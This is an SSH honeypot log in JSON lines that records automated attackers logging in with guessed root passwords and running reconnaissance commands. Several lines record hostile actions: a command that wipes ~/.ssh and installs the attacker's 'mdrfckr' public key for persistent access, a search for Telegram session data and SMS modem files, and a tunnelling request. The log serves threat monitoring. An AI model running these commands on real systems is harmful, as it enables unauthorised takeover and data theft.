{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:14:20.674312Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":20588,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ea9d6c9fbd3","protocol":"ssh","message":"New connection: 212.227.125.160:20588 (1.2.3.4:22) [session: 6ea9d6c9fbd3]","sensor":"my-vps","timestamp":"2025-08-26T15:14:20.678113Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:14:20.679242Z","src_ip":"212.227.125.160","session":"6ea9d6c9fbd3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":20829,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f7130de7460","protocol":"ssh","message":"New connection: 212.227.125.160:20829 (1.2.3.4:22) [session: 0f7130de7460]","sensor":"my-vps","timestamp":"2025-08-26T15:14:20.793552Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T15:14:20.794944Z","src_ip":"212.227.125.160","session":"0f7130de7460"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T15:14:20.909332Z","src_ip":"212.227.125.160","session":"0f7130de7460"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:14:21.254300Z","src_ip":"212.227.125.160","session":"0f7130de7460"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T15:14:21.369498Z","session":"0f7130de7460"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:14:22.354615Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-26T15:14:22.355644Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:14:22.833306Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:14:23.881136Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T15:14:23.881845Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:14:24.359514Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:14:26.078603Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-08-26T15:14:26.079416Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:14:26.559247Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:14:34.187405Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-08-26T15:14:34.188129Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52952,"dst_ip":"1.2.3.4","dst_port":22,"session":"470bd24735dd","protocol":"ssh","message":"New connection: 212.227.125.160:52952 (1.2.3.4:22) [session: 470bd24735dd]","sensor":"my-vps","timestamp":"2025-08-26T15:14:34.643129Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.0","message":"Remote SSH version: SSH-2.0-libssh2_1.11.0","sensor":"my-vps","timestamp":"2025-08-26T15:14:34.644111Z","src_ip":"212.227.125.160","session":"470bd24735dd"}
{"eventid":"cowrie.client.kex","hassh":"0079dec6da0c13e5e8d1ea56ca556b64","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c;aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-rsa-cert-v01@openssh.com","ssh-dss"],"encCS":["aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0079dec6da0c13e5e8d1ea56ca556b64","sensor":"my-vps","timestamp":"2025-08-26T15:14:34.964495Z","src_ip":"212.227.125.160","session":"470bd24735dd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:14:35.349516Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.session.closed","duration":"90.0","message":"Connection lost after 90.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:14:35.350843Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T15:14:36.418454Z","src_ip":"212.227.125.160","session":"470bd24735dd"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:14:37.741861Z","src_ip":"212.227.125.160","session":"470bd24735dd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:14:38.449524Z","src_ip":"212.227.125.160","session":"470bd24735dd"}
{"eventid":"cowrie.command.input","input":"/ip cloud print","message":"CMD: /ip cloud print","sensor":"my-vps","timestamp":"2025-08-26T15:14:38.450289Z","src_ip":"212.227.125.160","session":"470bd24735dd"}
{"eventid":"cowrie.command.failed","input":"/ip cloud print","message":"Command not found: /ip cloud print","sensor":"my-vps","timestamp":"2025-08-26T15:14:38.450767Z","src_ip":"212.227.125.160","session":"470bd24735dd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","size":30,"shasum":"b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:14:38.774760Z","src_ip":"212.227.125.160","session":"470bd24735dd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:14:39.436343Z","src_ip":"212.227.125.160","session":"470bd24735dd"}
{"eventid":"cowrie.command.input","input":"ifconfig","message":"CMD: ifconfig","sensor":"my-vps","timestamp":"2025-08-26T15:14:39.437248Z","src_ip":"212.227.125.160","session":"470bd24735dd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","size":901,"shasum":"1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:14:39.759301Z","src_ip":"212.227.125.160","session":"470bd24735dd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:14:40.492217Z","src_ip":"212.227.125.160","session":"470bd24735dd"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-26T15:14:40.492935Z","src_ip":"212.227.125.160","session":"470bd24735dd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:14:40.815645Z","src_ip":"212.227.125.160","session":"470bd24735dd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:14:41.512630Z","src_ip":"212.227.125.160","session":"470bd24735dd"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo","message":"CMD: cat /proc/cpuinfo","sensor":"my-vps","timestamp":"2025-08-26T15:14:41.513429Z","src_ip":"212.227.125.160","session":"470bd24735dd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","size":1412,"shasum":"52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:14:41.841318Z","src_ip":"212.227.125.160","session":"470bd24735dd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:14:42.502854Z","src_ip":"212.227.125.160","session":"470bd24735dd"}
{"eventid":"cowrie.command.input","input":"ps | grep '[Mm]iner'","message":"CMD: ps | grep '[Mm]iner'","sensor":"my-vps","timestamp":"2025-08-26T15:14:42.503582Z","src_ip":"212.227.125.160","session":"470bd24735dd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904","size":0,"shasum":"4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:14:42.830337Z","src_ip":"212.227.125.160","session":"470bd24735dd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:14:43.566651Z","src_ip":"212.227.125.160","session":"470bd24735dd"}
{"eventid":"cowrie.command.input","input":"ps -ef | grep '[Mm]iner'","message":"CMD: ps -ef | grep '[Mm]iner'","sensor":"my-vps","timestamp":"2025-08-26T15:14:43.567407Z","src_ip":"212.227.125.160","session":"470bd24735dd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437","size":0,"shasum":"e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:14:43.891696Z","src_ip":"212.227.125.160","session":"470bd24735dd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:14:44.565459Z","src_ip":"212.227.125.160","session":"470bd24735dd"}
{"eventid":"cowrie.command.input","input":"ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*","message":"CMD: ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*","sensor":"my-vps","timestamp":"2025-08-26T15:14:44.566265Z","src_ip":"212.227.125.160","session":"470bd24735dd"}
{"eventid":"cowrie.session.closed","duration":"293.6","message":"Connection lost after 293.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:15:29.005064Z","src_ip":"212.227.235.229","session":"a8ea07a0bc9c"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:15:30.793893Z","src_ip":"212.227.125.160","session":"0f7130de7460"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51710,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9b0f7c0b795","protocol":"ssh","message":"New connection: 212.227.235.229:51710 (1.2.3.4:22) [session: d9b0f7c0b795]","sensor":"my-vps","timestamp":"2025-08-26T15:15:31.495356Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T15:15:31.496132Z","src_ip":"212.227.235.229","session":"d9b0f7c0b795"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T15:15:31.604535Z","src_ip":"212.227.235.229","session":"d9b0f7c0b795"}
{"eventid":"cowrie.login.success","username":"root","password":"jesus1","message":"login attempt [root/jesus1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:15:32.079884Z","src_ip":"212.227.235.229","session":"d9b0f7c0b795"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:15:32.350837Z","src_ip":"212.227.235.229","session":"d9b0f7c0b795"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T15:15:32.351510Z","src_ip":"212.227.235.229","session":"d9b0f7c0b795"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T15:15:32.352519Z","src_ip":"212.227.235.229","session":"d9b0f7c0b795"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:15:32.462227Z","src_ip":"212.227.235.229","session":"d9b0f7c0b795"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:15:32.747497Z","src_ip":"212.227.235.229","session":"d9b0f7c0b795"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T15:15:32.748222Z","src_ip":"212.227.235.229","session":"d9b0f7c0b795"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T15:15:32.859684Z","src_ip":"212.227.235.229","session":"d9b0f7c0b795"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:15:32.860627Z","src_ip":"212.227.235.229","session":"d9b0f7c0b795"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51726,"dst_ip":"1.2.3.4","dst_port":22,"session":"036a9e11cda6","protocol":"ssh","message":"New connection: 212.227.235.229:51726 (1.2.3.4:22) [session: 036a9e11cda6]","sensor":"my-vps","timestamp":"2025-08-26T15:15:32.972845Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T15:15:32.974049Z","src_ip":"212.227.235.229","session":"036a9e11cda6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T15:15:33.088288Z","src_ip":"212.227.235.229","session":"036a9e11cda6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T15:15:33.586110Z","src_ip":"212.227.235.229","session":"036a9e11cda6"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:15:34.702109Z","src_ip":"212.227.235.229","session":"036a9e11cda6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39652,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c84dde52f4d","protocol":"ssh","message":"New connection: 212.227.235.229:39652 (1.2.3.4:22) [session: 2c84dde52f4d]","sensor":"my-vps","timestamp":"2025-08-26T15:15:34.812994Z"}
